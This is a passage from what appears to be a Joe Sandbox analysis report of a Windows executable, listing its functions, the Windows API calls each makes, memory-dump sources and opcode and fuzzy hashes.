                                                                                                                                                                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                                                            • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3ad05a59622b8132c393473dc36ead05014070bdaff2656d40238e23587f59e9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5a23b2cabf369d13f3d63828eb3fd9180bbf390f08f70fb09032f00011a2c4e7
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ad05a59622b8132c393473dc36ead05014070bdaff2656d40238e23587f59e9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43316F71610219BBDF12AFA5EC08FDA3BA9FF0D324F114211FA55E61A0C7B5D8A0DB94
                                                                                                                                                                                                                                                                                                                            Function 0025468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 002546B9
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 002546E7
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 002546F1
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025478A
                                                                                                                                                                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0025480E
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00254932
                                                                                                                                                                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0025496B
                                                                                                                                                                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,00270B64,?), ref: 0025498A
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 0025499D
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00254A21
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00254A35
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 92c13eb5f97c6b575071d1bc03d45188a87dc361444da3a8d990eeac654820fa
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5374b62f2c3525d7e2bc0f53bbf80f409f414db22864f8a72822ef00438cc110
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92c13eb5f97c6b575071d1bc03d45188a87dc361444da3a8d990eeac654820fa
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0C15671628305AFD700EF68C88492BB7E9FF89749F10491DF98A9B210DB71ED49CB52
                                                                                                                                                                                                                                                                                                                            Function 002484DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00248538
                                                                                                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002485D4
                                                                                                                                                                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 002485E8
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00270CD4,00000000,00000001,00297E8C,?), ref: 00248634
                                                                                                                                                                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002486B9
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00248711
                                                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0024879C
                                                                                                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002487BF
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 002487C6
                                                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0024881B
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00248821
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 15ffdaf9607c7bd282555459217135b515efa8a48965167e3f83e28b08f6fdc3
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2acc3a88c01aa46702db3797e54abe8b468f554325b8c0f9faacdd681a16d3bb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ffdaf9607c7bd282555459217135b515efa8a48965167e3f83e28b08f6fdc3
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68C11875A10119EFCB14DFA4C888DAEBBF9FF48304B158599E41A9B361DB30EE45CB90
                                                                                                                                                                                                                                                                                                                            Function 00230378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0023039F
                                                                                                                                                                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 002303F8
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 0023040A
                                                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 0023042A
                                                                                                                                                                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0023047D
                                                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00230491
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002304A6
                                                                                                                                                                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 002304B3
                                                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002304BC
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 002304CE
                                                                                                                                                                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002304D9
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f7d38163d2f06642bdbb06f44578386b8942a48f907f2b0c601fa0fd2d7ebe13
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 053b2886297dbdb6784ac7a8d4bc1b0561c98e459c4637af58b041fc79047040
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7d38163d2f06642bdbb06f44578386b8942a48f907f2b0c601fa0fd2d7ebe13
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10415175E1021DDFCB10DF95D8989AE7BB9EF48344F008065EA45A7261CB70EE55CFA0
                                                                                                                                                                                                                                                                                                                            Function 0023A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 0023A65D
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 0023A6DE
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 0023A6F9
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 0023A713
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 0023A728
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 0023A740
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0023A752
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 0023A76A
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 0023A77C
                                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 0023A794
                                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 0023A7A6
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 69551f69251a9e59e972929dde263f160d0c4274f92ff0e5a52c3c76ef8255f9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 1764371a326a33d630faa4f7e5ed902e07c7da866ab1f300dc5929eecf1eedee
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69551f69251a9e59e972929dde263f160d0c4274f92ff0e5a52c3c76ef8255f9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7641F8F46247CB6DFF318E6084493A9FEB4AB11304F08806DD5C64A5C2EBD499E4CB93
                                                                                                                                                                                                                                                                                                                            Function 00259730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                                                            • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e659f4b00d332ba4224a18c9cab7b82252ce51e287cc16b9f52ef86d0aaa83be
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fb6bb3227bce4261655b105e3f4a33b9b6f353e43b61c470b6f464dddca8439f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e659f4b00d332ba4224a18c9cab7b82252ce51e287cc16b9f52ef86d0aaa83be
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B51E231A20117DBCF14DFA8C9509BEB3A5BF65321B20422AEC66E7380DB31DE94C794
                                                                                                                                                                                                                                                                                                                            Function 00254189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CoInitialize.OLE32 ref: 002541D1
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 002541DC
                                                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00270B44,?), ref: 00254236
                                                                                                                                                                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 002542A9
                                                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00254341
                                                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00254393
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                            • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                                                            • Opcode ID: fd498b707de6a4754b6813bca30248a842b2705cffb40a1e9f74b43529927aee
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 078d1a04f24b712ac414cb41023e9ce1336fd7b844ddfebdf02bfe83f743da72
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd498b707de6a4754b6813bca30248a842b2705cffb40a1e9f74b43529927aee
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C61D270628711AFC310EF54D888B6EF7E4AF49719F100449FC85972A1C770ED98CB96
                                                                                                                                                                                                                                                                                                                            Function 00248BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00248C9C
                                                                                                                                                                                                                                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00248CAC
                                                                                                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00248CB8
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00248D55
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248D69
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248D9B
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00248DD1
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00248DDA
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 12e498f94c9a8873555972908e596a2aefb42e53972acf608863fc1c23a6924f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: fbc40bce9b22a2f8b85ae829123bb5c9c18b34d4c8261836543ca858de40f59f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12e498f94c9a8873555972908e596a2aefb42e53972acf608863fc1c23a6924f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39615A729243059FCB14EF60C884AAFB3E8FF99314F04491EF98987251DB35E955CB92
                                                                                                                                                                                                                                                                                                                            Function 002646E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateMenu.USER32 ref: 00264715
                                                                                                                                                                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 00264724
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002647AC
                                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 002647C0
                                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 002647CA
                                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002647F7
                                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 002647FF
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 7adf78b96af6d8e7d391fc52c35d00de8af58b7518d7e663b7fb91d99d932734
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 682b3db6549cc08a2483f896ef6e5ddd1b4666f6c49fb263d184b85828e7d97d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7adf78b96af6d8e7d391fc52c35d00de8af58b7518d7e663b7fb91d99d932734
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1418D75A1124AEFDB14DF64E848EAA7BB6FF09314F144129FA4697350C770A924CF50
                                                                                                                                                                                                                                                                                                                            Function 0023282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 002328B1
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 002328BC
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 002328D8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002328DB
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 002328E4
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 002328F8
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002328FB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0a183f7f7fc7c6025c89cf47c65cc96e2676aa658469d445ab47dcdca08cf47c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 19fcdbfdff772980e55bca6bb231150418129aca3ae256ed066b930676af8591
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a183f7f7fc7c6025c89cf47c65cc96e2676aa658469d445ab47dcdca08cf47c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B21C2B4E10118FBCF01AFA0DC89EEEBBB9EF15310F104156F952A32A1DB755818DB60
                                                                                                                                                                                                                                                                                                                            Function 0023290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002345FD: GetClassNameW.USER32(?,?,000000FF), ref: 00234620
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00232990
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 0023299B
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32 ref: 002329B7
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002329BA
                                                                                                                                                                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 002329C3
                                                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 002329D7
